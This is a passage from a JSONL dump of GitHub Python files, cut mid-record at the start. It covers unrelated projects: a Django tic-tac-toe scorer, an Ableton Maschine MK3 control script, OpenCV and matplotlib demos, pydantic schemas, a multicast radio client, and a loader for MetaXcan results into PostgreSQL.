1\":\r\n try:\r\n g=Score.objects.get(Name=n2)\r\n print(g.Lost)\r\n g.Lost=g.Lost+1\r\n g.save()\r\n except:\r\n g=Score(Name=n2,Won=0,Lost=1)\r\n g.save()\r\n \r\n\r\n elif one=='O':\r\n win = n2 + \" winner\"\r\n # score = Score(Name=n2, Won=True)\r\n # score.save()\r\n # score = Score(Name=n1)\r\n # score.save()\r\n if n2 !=\"Player 1\":\r\n try:\r\n g=Score.objects.get(Name=n2)\r\n print(g.Won)\r\n g.Won=g.Won+1\r\n g.save()\r\n except:\r\n g=Score(Name=n2,Won=1,Lost=0)\r\n g.save()\r\n if n1 !=\"Player 1\":\r\n try:\r\n g=Score.objects.get(Name=n1)\r\n print(g.Lost)\r\n g.Lost=g.Lost+1\r\n g.save()\r\n except:\r\n g=Score(Name=n1,Won=0,Lost=1)\r\n g.save()\r\n print(\"name2\")\r\n else :\r\n win=\"draw match\"\r\n m={\"w\":win}\r\n return render(request,'winner.html',m)\r\n\r\ndef view(request):\r\n scoreall=Score.objects.all\r\n msg={\r\n \"scoreall\":scoreall\r\n }\r\n return render(request,\"view.html\",msg)","repo_name":"AnveshBemore/tictactoedjango","sub_path":"dbtictactoe/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15796052874","text":"import threading\nimport queue\n\n\nclass BytecountLimitedQueue(object):\n \"\"\"Looks like a Queue, but limits the total number of bytes in the queue.\n\n We parametrize the Queue with a function that decides how many bytes are in a\n given message.\n \"\"\"\n\n def __init__(self, bytecountFunction, maxBytes=None):\n self._bytecountFunction = bytecountFunction\n self._canPushCondition = threading.Condition(threading.Lock())\n self._underlyingQueue = queue.Queue()\n self.totalBytes = 0\n self.maxBytes = None\n\n def pendingCount(self):\n return self._underlyingQueue.qsize()\n\n def setMaxBytes(self, bytecount):\n self.maxBytes = bytecount\n\n with self._canPushCondition:\n self._canPushCondition.notify_all()\n\n def put(self, msg, block=True, allowWriteWhileOverLimit=False):\n with self._canPushCondition:\n msgLen = self._bytecountFunction(msg)\n\n if not allowWriteWhileOverLimit:\n if block:\n while self.isBlocked():\n self._canPushCondition.wait()\n\n elif self.isBlocked():\n raise queue.Full()\n\n self.totalBytes += msgLen\n self._underlyingQueue.put(msg)\n\n def isBlocked(self):\n return self.maxBytes is not None and self.totalBytes >= self.maxBytes\n\n def get(self, timeout=None):\n msg = self._underlyingQueue.get(timeout=timeout)\n\n with self._canPushCondition:\n blocked = self.isBlocked()\n\n self.totalBytes -= self._bytecountFunction(msg)\n\n if blocked != self.isBlocked():\n self._canPushCondition.notify_all()\n\n return msg\n","repo_name":"APrioriInvestments/object_database","sub_path":"object_database/bytecount_limited_queue.py","file_name":"bytecount_limited_queue.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"3325804613","text":"# Embedded file name: C:\\ProgramData\\Ableton\\Live 9 Suite\\Resources\\MIDI Remote Scripts\\Maschine_MK3\\TrackMode.py\n# Compiled at: 2017-09-17 14:33:24\nimport Live\nfrom _Framework.ControlSurface import ControlSurface, _scheduled_method\nfrom _Framework.InputControlElement import *\nfrom _Framework.ButtonElement import *\nfrom _Framework.CompoundComponent import CompoundComponent\nfrom MidiMap import debug_out, toHSB\nfrom _Framework.SubjectSlot import subject_slot\nfrom Constants import *\nfrom MaschineMode import MaschineMode\n\nclass 
TrackHandler(CompoundComponent):\n __index = None\n __button = None\n __track = None\n __action = None\n __use_track_color = True\n __active = False\n\n def __init__(self, index, *a, **k):\n super(TrackHandler, self).__init__(*a, **k)\n self.__index = index\n\n def set_track_button(self, button):\n self.__button = button\n\n def release_button(self):\n self.__button = None\n return\n\n def set_no_track_action(self, action):\n if self.__action:\n self.__button.remove_value_listener(self.__action)\n self.__action = action\n self.__button.add_value_listener(self.__action, True)\n self.__active = True\n\n def assign_track(self, track):\n if self.__action:\n self.__button.remove_value_listener(self.__action)\n if track:\n self.__track = track\n self.__action = self._track_action\n self.__button.add_value_listener(self.__action, True)\n self._handle_color_changed.subject = self.__track\n self.__active = True\n else:\n self.__track = None\n self.__action = None\n self.__active = False\n return\n\n def unbind(self):\n if self.__action:\n self.__button.remove_value_listener(self.__action)\n if self.__track:\n self._handle_color_changed.subject = None\n self.__action = None\n self.__track = None\n self.__active = False\n return\n\n def _track_action(self, value, button):\n if value == 0:\n self.canonical_parent.handle_track_select(self.__track)\n\n def update_value(self):\n pass\n\n def send_color(self, value=0):\n if not self.__active:\n return\n if self.__track:\n color = toHSB(self.__track.color)\n self.__button.send_color_direct(color[self.__track != self.song().view.selected_track and 1 or 0])\n else:\n self.__button.send_color_direct(0)\n\n @subject_slot('color')\n def _handle_color_changed(self):\n if not self.__active:\n return\n if self.__track and self.__use_track_color:\n self.send_color()\n\n\nclass TrackMode(MaschineMode):\n __track_handlers = None\n __mode = SEL_MODE_SELECT\n\n def __init__(self, *a, **k):\n super(TrackMode, self).__init__(*a, **k)\n self.__track_handlers = [ TrackHandler(idx) for idx in range(16) ]\n self._handle_selection.subject = self.song().view\n self._tracks_change.subject = self.song()\n self._visible_changed.subject = self.song()\n\n @subject_slot('selected_track')\n def _handle_selection(self):\n if not self._active:\n return\n if self.__mode == SEL_MODE_SELECT:\n for i in range(8):\n self.__track_handlers[i].send_color()\n\n @subject_slot('tracks')\n def _tracks_change(self):\n if not self._active:\n return\n self._assign_tracks()\n self.refresh()\n\n @subject_slot('visible_tracks')\n def _visible_changed(self):\n if not self._active:\n return\n self._assign_tracks()\n self.refresh()\n\n def init_elements(self):\n for button, (column, row) in self.canonical_parent._bmatrix.iterbuttons():\n if button:\n index = row * 4 + column\n self.__track_handlers[index].set_track_button(button)\n\n def navigate(self, direction, modifier, alt_modifier=False):\n pass\n\n def get_color(self, value, column, row):\n return (4, 7)[value > 0 and 1 or 0]\n\n def get_mode_id(self):\n return TRACK_MODE\n\n def refresh(self):\n if self._active:\n for handler in self.__track_handlers:\n handler.send_color()\n\n def notify(self, blink_state):\n if blink_state == 0 or blink_state == 2:\n pass\n\n def notify_mono(self, blink_state):\n pass\n\n def gettrack(self, index, off):\n tracks = self.song().visible_tracks\n if index + off < len(tracks):\n return tracks[index + off]\n return\n\n def _deassign(self):\n for handler in self.__track_handlers:\n handler.unbind()\n\n def 
_assign_tracks(self):\n trackoff = self.canonical_parent._session.track_offset()\n for i in range(16):\n handler = self.__track_handlers[i]\n handler.unbind()\n if i < 8:\n track = self.gettrack(i, trackoff)\n if track is None:\n handler.set_no_track_action(self.empty_action)\n else:\n handler.assign_track(track)\n else:\n handler.set_no_track_action(self._global_action)\n\n return\n\n def _global_action(self, value, button):\n if value == 0:\n return\n\n def empty_action(self, value, button):\n if value == 0:\n return\n if self.canonical_parent.is_shift_down():\n self.song().create_audio_track(-1)\n else:\n if self.canonical_parent.is_select_down():\n self.song().create_audio_track(-1)\n else:\n self.song().create_midi_track(-1)\n\n def handle_shift(self, shift_value):\n if shift_value:\n for handler in self.__track_handlers:\n handler.set_no_track_action(self.handle_shift_button)\n\n else:\n self._assign_tracks()\n\n def handle_shift_button(self, value, button):\n if value != 0:\n self.canonical_parent.handle_edit_action(button.get_position())\n\n def enter(self):\n self._active = True\n self._assign_tracks()\n self.refresh()\n\n def exit(self):\n self._active = False\n self._deassign()\n\n\nclass LevelTracks(CompoundComponent):\n __track = None\n __color = 0\n __index = 0\n __last_meter_val = 0\n __last_bar = (0, 0, 0, 0)\n\n def __init__(self, index, *a, **k):\n super(LevelTracks, self).__init__(*a, **k)\n self.__index = index\n self.__buttons = [None, None, None, None]\n return\n\n def set_button(self, button, index):\n self.__buttons[index] = button\n\n def set_track(self, track):\n self.__track = track\n if track:\n self.__color = toHSB(track.color)[1]\n self._output_meter_changed.subject = track\n else:\n self._output_meter_changed.subject = None\n return\n\n def to_bar(self, value):\n return (\n value >= 3 and self.__color + 2 or value == 2 and self.__color or 0,\n value >= 5 and self.__color + 2 or value == 4 and self.__color or 0,\n value >= 7 and self.__color + 2 or value == 8 and self.__color or 0,\n value >= 9 and self.__color + 2 or value == 9 and self.__color or 0)\n\n @subject_slot('output_meter_level')\n def _output_meter_changed(self):\n if self.__track:\n val = int(10 * self.__track.output_meter_level)\n if val != self.__last_meter_val:\n self.__last_bar = self.to_bar(val)\n self.send_color()\n\n def send_color(self):\n if self.__track:\n self.__buttons[0].send_color_direct(self.__last_bar[0])\n self.__buttons[1].send_color_direct(self.__last_bar[1])\n self.__buttons[2].send_color_direct(self.__last_bar[2])\n self.__buttons[3].send_color_direct(self.__last_bar[3])\n else:\n for button in self.__buttons:\n button.send_color_direct(0)\n\n def unbind(self):\n self.__track = None\n self._output_meter_changed.subject = None\n return\n\n\nclass LevelIndicatorMode(MaschineMode):\n __track_handlers = None\n\n def __init__(self, *a, **k):\n super(LevelIndicatorMode, self).__init__(*a, **k)\n self.__track_handlers = [ LevelTracks(idx) for idx in range(4) ]\n\n def init_elements(self):\n for button, (column, row) in self.canonical_parent._bmatrix.iterbuttons():\n if button:\n self.__track_handlers[column].set_button(button, 3 - row)\n\n def gettrack(self, index, off):\n tracks = self.song().visible_tracks\n if index + off < len(tracks):\n return tracks[index + off]\n return\n\n def refresh(self):\n if self._active:\n for handler in self.__track_handlers:\n handler.send_color()\n\n def _assign_tracks(self):\n self._tracks_change.subject = self.song()\n self._visible_changed.subject 
= self.song()\n        trackoff = self.canonical_parent._session.track_offset()\n        for i in range(4):\n            handler = self.__track_handlers[i]\n            handler.unbind()\n            track = self.gettrack(i, trackoff)\n            handler.set_track(track)\n\n    def _deassign(self):\n        self._tracks_change.subject = None\n        self._visible_changed.subject = None\n        for handler in self.__track_handlers:\n            handler.unbind()\n\n        return\n\n    @subject_slot('tracks')\n    def _tracks_change(self):\n        self._assign_tracks()\n        self.refresh()\n\n    @subject_slot('visible_tracks')\n    def _visible_changed(self):\n        self._assign_tracks()\n        self.refresh()\n\n    def enter(self):\n        self._active = True\n        self._assign_tracks()\n        self.refresh()\n\n    def exit(self):\n        self._active = False\n        self._deassign()\n","repo_name":"alessandroseno/AbletonLive10_MIDIRemoteScripts","sub_path":"Maschine_Mk3_Legacy/TrackMode.py","file_name":"TrackMode.py","file_ext":"py","file_size_in_byte":9935,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
{"seq_id":"34869460146","text":"import cv2 as cv\nimport numpy as np\n\n\nimg = cv.imread('./photos/vscode.png')\ncv.imshow(\"VS Code\", img)\nblank = np.zeros(img.shape, np.uint8)\n#Split to color channels\nb,g,r = cv.split(img)\ncv.imshow(\"Blue\", b)\ncv.imshow(\"Green\", g)\ncv.imshow(\"Red\", r)\n\nblue = cv.merge((b,blank,blank))\ngreen = cv.merge((blank,g,blank))\nred = cv.merge((blank,blank,r))\ncv.imshow(\"Blue\", blue)\ncv.imshow(\"Green\", green)\ncv.imshow(\"Red\", red)\n\nprint(b.shape)\nprint(g.shape)\nprint(r.shape)\n\n#Merge color channels\nmerged = cv.merge((b,g,r))\ncv.imshow(\"Merged\", merged)\n\n\n\ncv.waitKey(0)","repo_name":"hasanaliozkan-dev/opencv_tutorial","sub_path":"splitmerge.py","file_name":"splitmerge.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"23730183602","text":"import sys\n\n\ndef fibonacci_recursivo(n):\n    if n==0 or n==1:\n        return 1\n    return fibonacci_recursivo(n-1)+fibonacci_recursivo(n-2)\n\ndef fibonacci_dinamico(n,memo={}):\n    if n==0 or n==1:\n        return 1\n    try:\n        return memo[n] #does the fibonacci number for n already exist?\n    except KeyError:\n        resultado= fibonacci_dinamico(n-1,memo)+fibonacci_dinamico(n-2,memo)\n        memo[n]=resultado #store it under its position in the fibonacci sequence\n        return resultado\n\nif __name__ == \"__main__\":\n    sys.setrecursionlimit(10002)\n    n=int(input('Pick a number: '))\n    resultado=fibonacci_dinamico(n)\n    print(resultado)","repo_name":"BralexMtz/Curso-Estadistica-Computacional-Python","sub_path":"programacion_dinamica.py","file_name":"programacion_dinamica.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"72996687874","text":"from pydantic import BaseModel, EmailStr, conint\nfrom datetime import datetime\nfrom typing import Optional\n\n# by having these schemas you are regulating what can be changed or called when \n# using a get, post, delete, or update. By having these specific classes for each instance 
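\n# you can have specific parameters in place. 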
\n# for example, if I want you to only be able to update the title \n# I can only have the title available under the UpdateCourse class\n# Or if I want to make something mandatory I will have it under that class\n\nclass CourseBase(BaseModel):\n    title: str\n    requirements: str\n    created_at: datetime\n\nclass Course(CourseBase):\n    id: int\n    owner_id: int\n    \n\n    class Config:\n        orm_mode = True\n\n\nclass UniOut(BaseModel):\n    id: int\n    name: str\n    img: str\n    nickname: str\n    color: str\n    text_color: str\n\n    class Config:\n        orm_mode = True\n\nclass CourseOut(CourseBase):\n    id: int\n    link: str\n    owner_id: int\n    owner: UniOut\n    \n\n    class Config:\n        orm_mode = True\n\n\n\nclass CreateCourse(BaseModel):\n    title: str\n    requirements: str\n    link : str\n\nclass UpdateCourse(BaseModel):\n    title: str\n    requirements: str\n    link: str\n\n# can also make use of inheritance \n# a class that inherits from another has all of its schemas \n\nclass CreateCourses(BaseModel):\n    Course: CreateCourse\n\n\n\n\n\nclass UniCreate(BaseModel):\n    name: str\n    img: str\n    color: str\n    text_color: str\n    nickname: str\n    password: str\n\n\n\n\nclass UniLogin(BaseModel):\n    name: str\n    password: str\n\nclass UpdateUni(BaseModel):\n    name: str\n    img: str\n    color: str\n    text_color: str\n    nickname: str\nclass Token(BaseModel):\n    access_token: str\n    token_type: str\n\nclass TokenData(BaseModel):\n    id: Optional[str] = None\n\n\n\n\n","repo_name":"JackBCJones/FMD_API","sub_path":"app/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"35887705787","text":"from django.shortcuts import render\n\nfrom positions.models import Account, Position\nfrom . import analysis_utils as au\n\n\ndef index(request):\n    \"\"\"Primary view for portfolio analysis\"\"\"\n\n    positions_data = au.get_position_data(Position.objects.all())\n    accounts = Account.objects.all()\n    total_cash = sum((acct.cash_balance for acct in accounts))\n\n    concentration_bar_chart = au.get_concentration_bar_chart(positions_data)\n    concentration_area_chart = au.get_concentration_area_chart(positions_data)\n\n    context = {\n        \"positions\": positions_data.to_html(index=False, float_format=lambda x: '%10.2f' % x),\n        \"accounts\": [acct.name for acct in accounts],\n        \"cash_balances\": {acct: acct.cash_balance for acct in accounts},\n        \"total_cash\": \"{:,.2f}\".format(total_cash),\n        \"total_value\": \"{:,.2f}\".format(total_cash + positions_data[\"Market Value ($)\"].sum()),\n        \"num_positions\": positions_data.shape[0],\n        \"concentration_bar_chart\": concentration_bar_chart,\n        \"concentration_area_chart\": concentration_area_chart,\n    }\n\n    return render(request, \"analysis/index.html\", context)\n","repo_name":"rdcolema/snapshot-finance","sub_path":"analysis/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"61"}
{"seq_id":"20225342246","text":"def solution(matrix_sizes):\n    n = len(matrix_sizes)\n    INF = int(1e9)\n    dp = [[INF] * n for _ in range(n)]\n\n    for i in range(n):\n        for j in range(n):\n            if i == j:\n                dp[i][j] = 0\n\n    for step in range(1, n):\n        for start in range(n):\n            end = start + step\n            if end >= n:\n                break\n            for sep in range(start, end):\n                dp[start][end] = min(dp[start][end],\n                                     dp[start][sep] + dp[sep + 1][end]\n                                     + matrix_sizes[start][0] * matrix_sizes[sep][1] * matrix_sizes[end][1])\n\n    return 
dp[0][n-1]","repo_name":"ko509/Weekly-AlgoStudy","sub_path":"1차/3주차/우민지/[Pro] 최적의 행렬곱셈.py","file_name":"[Pro] 최적의 행렬곱셈.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"71325235396","text":"import socket\nimport signal\nimport threading\nimport requests\nimport sys\nimport struct\nfrom time import sleep\n\ntcp_sock = None\n\n\ndef exterminate(arg1, arg2):\n tcp_sock.send(requests.exit_msg())\n sys.exit(0)\n\n\ndef listen(sock):\n print(\"listen...\")\n while True:\n try:\n sleep(2)\n data = sock.recv(1024)\n print(data.decode(\"utf-8\"))\n except OSError:\n return\n\n\ndef show_help():\n print('''\n!help - show help\n!list - get stations\n!station - connect to station\n!stop - disconnect from station\n''')\n\n\nif __name__ == '__main__':\n if len(sys.argv[1:]) != 3:\n print(\"usage : %s \")\n sys.exit(1)\n port = int(sys.argv[3])\n server_port = int(sys.argv[2])\n server_ip = sys.argv[1]\n udp_thread = None\n udp_sock = None\n\n signal.signal(signal.SIGINT, exterminate)\n\n tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n tcp_sock.connect((server_ip, server_port))\n show_help()\n while True:\n cmd = input()\n if cmd == '!help':\n show_help()\n elif cmd == '!list':\n tcp_sock.send(requests.list_msg())\n stations = tcp_sock.recv(1024).decode(\"utf-8\")\n print(stations)\n elif cmd.split()[0] == '!station':\n tcp_sock.send(requests.station_msg(cmd.split()[1]))\n while True:\n song, ret = requests.parse_song(tcp_sock.recv(1024))\n if ret is None:\n break\n tcp_sock.send(requests.list_msg())\n print(song)\n addr = song\n print(addr)\n udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n udp_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n udp_sock.bind(('', server_port))\n addr_bytes = struct.pack(\"=4sl\", socket.inet_aton(addr), socket.INADDR_ANY)\n udp_sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, addr_bytes)\n udp_thread = threading.Thread(target=listen, args=(udp_sock,))\n udp_thread.daemon = True\n udp_thread.start()\n elif cmd == '!stop':\n udp_sock.close()\n else:\n show_help()\n","repo_name":"artfly/Networks","sub_path":"radio/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38079071375","text":"with open('Chapter 9\\\\input.txt', 'r') as f:\n # ✅ get list of all lines\n lines = f.read().splitlines()\n\nsum = 0\nfor line in lines:\n left, right = line.split(',')\n l1 = list(range(int(left.split('-')[0]), int(left.split('-')[1])+1))\n l2 = list(range(int(right.split('-')[0]), int(right.split('-')[1])+1))\n if(any(x in l1 for x in l2)) or (any(x in l2 for x in l1)):\n sum += 1\n\nprint(sum)","repo_name":"bartoszc/Python-Crash-Course-Solutions","sub_path":"Chapter 9/day_4.py","file_name":"day_4.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23506311101","text":"import sys\n\n\"\"\"\ndef stupid_is_prime(n):\n for i in range(2, n-1):\n if n % i == 0:\n return i, False\n return None, True\n\ndef all_bases_not_prime(n):\n return not any([stupid_is_prime(int(str(n), base))[1] for base in range(2, 10+1)])\n\"\"\"\n\ndef read_case(line):\n line = line.strip().split()\n return int(line[0]), int(line[1])\n\nfactor = {2: 3, 3: 2, 4: 5, 5: 2, 6: 7, 7: 2, 8: 3, 9: 2, 10: 11}\n\n\ndef 
divisible_by_base_factor(n):\n for base in range(2, 10+1):\n number_in_base = int(str(n), base)\n if number_in_base % factor[base] != 0:\n return False\n return True\n\n\ndef make_solution(case):\n length, coun = case\n\n solution = []\n i = 0\n for number in range(2**(length-1)+1, 2**length, 2):\n number = bin(number)[2:]\n\n if divisible_by_base_factor(number):\n solution.append(str(number)+\" \" + \" \".join([str(factor[b]) for b in range(2, 10+1)]))\n i += 1\n\n if i>=coun:\n break\n\n return \"\\n\".join(solution)\n\n\nif __name__ == \"__main__\":\n #f = sys.stdin\n f = open(\"samples.text\")\n count = int(f.readline())\n for c in range(count):\n case = read_case(f.readline())\n solution = make_solution(case)\n print(\"Case #{}:\\n{}\".format(c+1, solution))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_179/2091.py","file_name":"2091.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29836190453","text":"from react_integration.settings import TEMPLATES\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nimport joblib\nfrom django.template.response import TemplateResponse\n\ndef index(request):\n print(request.GET)\n if request.method == 'GET' and 'input-form' in request.GET: \n P = joblib.load('finalized_model3.sav')\n lis1=[]\n lis1.append(request.GET['input-form'])\n answer1=P.predict(lis1)\n print(answer1)\n return render(request,\"index.html\",{'text1':answer1}) \n print(\"the request iss in method1\")\n else:\n print(\"request not in method\")\n sainterface=TemplateResponse(request,'index.html',{})\n return sainterface\n #return render(request,\"/sa_interface/build`/index.html\")\n # answer=1\n # if request.method == 'GET' and 'q' in request.GET:\n # q=request.GET['q']\n # if q:\n # print(\"There is some value\")\n # return render(request,\"index.html\",{'text':answer})\n # else:\n # print(\"The value is empty \")\n # return render(request,\"index.html\")\n # P = joblib.load('finalized_model3.sav')\n # review=\"the product is good also\"\n # lis=[]\n # lis.append(\"this product is very good\")\n # # lis.append(request.GET)\n # answer = P.predict(lis)\n # print(answer)\n # print(\"hello\")\n # lis1=[]\n \n\n \n\n \n \n # print(request.GET)\n # data=(request.GET)\n # print(\"The data is\")\n # forward=0\n # print(forward)\n # # print(data)\n # # move=(request.GET['forward'])\n # # print(move)\n # return render(request,\"index.html\",{'text':answer})\n\ndef ok(request):\n P = joblib.load('finalized_model3.sav')\n lis1=[]\n lis1.append(request.GET['comment'])\n answer1=P.predict(lis1)\n print(answer1)\n\n return render(request,\"index.html\",{'text':answer1})\n","repo_name":"ashishadhikary/sentimentUI","sub_path":"react_integration/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39082699553","text":"#Histogram with a best fit line\r\n\r\nimport numpy as np\r\nimport matplotlib.mlab as mlab #For the best fit line\r\nimport matplotlib.pyplot as plt\r\n \r\n \r\n# Random example data\r\nmu = 100 # mean of distribution\r\nsigma = 15 # standard deviation of distribution\r\nx = mu + sigma * np.random.randn(100000) #Normalised data\r\n \r\nnum_bins = 20\r\n# the histogram of the data\r\nn, bins, patches = plt.hist(x, num_bins, normed=1, facecolor='blue', alpha=0.5)\r\n \r\n# add a 'best fit' 
line\r\ny = mlab.normpdf(bins, mu, sigma)\r\nplt.plot(bins, y, 'r--')\r\n\r\n#Histogram details\r\nplt.xlabel('Data Point')\r\nplt.ylabel('Probability')\r\nplt.title(r'Sample Histogram')\r\n \r\n# Tweak spacing to prevent clipping of ylabel\r\nplt.subplots_adjust(left=0.15)\r\nplt.show()\r\n","repo_name":"srinidhi151/Book","sub_path":"Part 4/Chapter 18/Distribution_charts_2(Listing_8).py","file_name":"Distribution_charts_2(Listing_8).py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"2580026323","text":"#! /usr/bin/env python\n\nimport os\nimport psycopg2\nimport scipy.stats as stats\nimport logging\nimport Logging\n\nclass CSVTF1(object):\n GENE=0\n GENE_NAME=1\n ZSCORE=2\n PVALUE=3\n PRED_PERF_R2=4\n VAR_G=5\n N=6\n COVARIANCE_N=7\n MODEL_N=8\n\n header=\"gene,gene_name,zscore,pvalue,pred_perf_R2,VAR_g,n,covariance_n,model_n\"\n\nclass CSVTF2(object):\n GENE=0\n GENE_NAME=1\n ZSCORE=2\n VAR_G=3\n N=4\n COVARIANCE_N=5\n MODEL_N=6\n PRED_PERF_R2=7\n\n header=\"gene,gene_name,zscore,VAR_g,n,covariance_n,model_n,pred_perf_R2\"\n\ndef check_table(conn, table_name):\n if not str.isalnum(table_name):\n raise RuntimeError(\"Won't accept %s\" %(table_name,))\n cursor = conn.cursor()\n query = 'CREATE TABLE IF NOT EXISTS metaxcanresults (' \\\n ' \"gene\" varchar,' \\\n ' \"gene_name\" varchar,' \\\n ' \"zscore\" real,' \\\n ' \"n\" integer,' \\\n ' \"model_n\" integer,' \\\n ' \"pred_perf_r2\" real,' \\\n ' \"pval\" double precision,' \\\n ' \"tissue\" varchar,' \\\n ' \"pheno\" varchar' \\\n ' );'\n\n cursor.execute(query)\n conn.commit()\n\n\ndef process_results_file(path, conn, table_name, tissue_tag=None):\n if not str.isalnum(table_name):\n raise RuntimeError(\"Cannot accept %s\" % (table_name, ))\n\n content = os.path.basename(os.path.normpath(path))\n\n tissue = content\n if \"_elasticNet\" in tissue: tissue =tissue.split(\"_elasticNet\")[0]\n if \"-unscaled\" in tissue: tissue = tissue.split(\"-unscaled\")[0]\n if \".csv\" in tissue: tissue = tissue.split(\".csv\")[0]\n\n if \"_DGN\" in tissue:\n pheno = tissue.split(\"_DGN\")[0]\n tissue = \"DGN_WB\"\n elif \"DGN\" in tissue:\n pheno = tissue.split(\"DGN\")[0]\n tissue = \"DGN_WB\"\n elif \"_TW_\" in tissue:\n pheno = tissue.split(\"_TW_\")[0]\n tissue = \"TW_\"+tissue.split(\"_TW_\")[1]\n elif \"TW_\" in tissue:\n pheno = tissue.split(\"TW_\")[0]\n tissue = \"TW_\"+tissue.split(\"TW_\")[1]\n elif \"_CrossTissue_\" in tissue:\n pheno = tissue.split(\"_CrossTissue_\")[0]\n tissue = \"CrossTissue\"\n elif \"CrossTissue_\" in tissue:\n pheno = tissue.split(\"CrossTissue_\")[0]\n tissue = \"CrossTissue\"\n else:\n logging.info(\"Bad name: %s\", content)\n return\n\n if tissue_tag:\n tissue = tissue + tissue_tag\n\n logging.info(\"opening %s\",path)\n cursor = conn.cursor()\n data = []\n with open(path) as file:\n for i, line in enumerate(file):\n if i==0:\n header = line.strip()\n if header == CSVTF1.header:\n logging.info(\"selected new format\")\n RTF=CSVTF1\n elif header == CSVTF2.header:\n logging.info(\"selected old format\")\n RTF=CSVTF2\n else:\n raise RuntimeError(\"Invalid header\")\n continue\n # if i % 1000 == 0:\n # logging.info(\"Rolling!\")\n\n\n comps = line.strip().split(\",\")\n if comps[RTF.ZSCORE] == \"NA\": continue\n if \"inf\" in comps[RTF.ZSCORE]: continue\n\n gene = comps[RTF.GENE]\n gene_name = comps[RTF.GENE_NAME]\n zscore = float(comps[RTF.ZSCORE])\n n = int(comps[RTF.N])\n model_n = int(comps[RTF.MODEL_N])\n 
pred_perf_r2 = float(comps[RTF.PRED_PERF_R2])\n if RTF == CSVTF1:\n pval = float(comps[RTF.PVALUE])\n else:\n pval = stats.norm.sf(abs(zscore)) * 2\n\n data.append((gene, gene_name, zscore, n, model_n, pred_perf_r2, pval, tissue, pheno, ))\n # cursor.execute(\n # \"insert into \" + table_name + \" (gene, gene_name, zscore, n, model_n, pred_perf_r2, pval, pheno, tissue) values (%s,%s,%s,%s,%s,%s,%s,%s,%s)\",\n # (gene, gene_name, zscore, n, model_n, pred_perf_r2, pval, pheno, tissue,))\n logging.info(\"Making query\")\n dataText = ','.join(cursor.mogrify('(%s,%s,%s,%s,%s,%s,%s,%s,%s)', row) for row in data)\n cursor.execute('insert into ' + table_name + ' values ' + dataText)\n conn.commit()\n\nclass LoadIntoSQL(object):\n def __init__(self, args):\n self.args = args\n\n def run(self):\n logging.info(\"Connecting...\")\n conn = self.build_connection()\n\n logging.info(\"Checking table...\")\n check_table(conn,self.args.table_name)\n\n logging.info(\"processing\")\n contents = os.listdir(self.args.results_folder)\n\n for content in contents:\n skip = False\n for e in self.args.exclude_patterns:\n if e in content:\n skip = True\n break\n if skip:\n logging.info(\"skipping %s\", content)\n continue\n\n logging.info(\"processing %s\", content)\n path = os.path.join(self.args.results_folder, content)\n process_results_file(path, conn, self.args.table_name, self.args.tissue_tag)\n\n def build_connection(self):\n conn = psycopg2.connect(host=self.args.host, database=self.args.db_name, user=self.args.user_name, password=self.args.user_password)\n return conn\n\nif __name__== \"__main__\":\n import argparse\n\n\n parser = argparse.ArgumentParser(description='Load results into SQL')\n\n parser.add_argument(\"--host\",\n help=\"db host\",\n default=\"127.0.0.1\")\n\n parser.add_argument(\"--db_name\",\n help=\"database name\",\n default=\"kk2\")\n\n parser.add_argument(\"--user_name\",\n help=\"database user name\")\n\n parser.add_argument(\"--user_password\",\n help=\"database user name\")\n\n parser.add_argument(\"--table_name\",\n help=\"alphanumeric table name\",\n default=\"metaxcanresults\")\n\n parser.add_argument('--exclude_patterns', type=str, nargs='+',\n help='Strings to filter out results files. (not regexp at the moment)',\n default=[\"TS_\", \"Organ_\"])\n\n parser.add_argument(\"--results_folder\",\n help=\"path to folder with metaxcan results\",\n default=\"results\")\n\n parser.add_argument(\"--tissue_tag\",\n help=\"String addition to tissue name\",\n default=None)\n\n parser.add_argument(\"--verbosity\",\n help=\"Log verbosity level. 1 is everything being logged. 
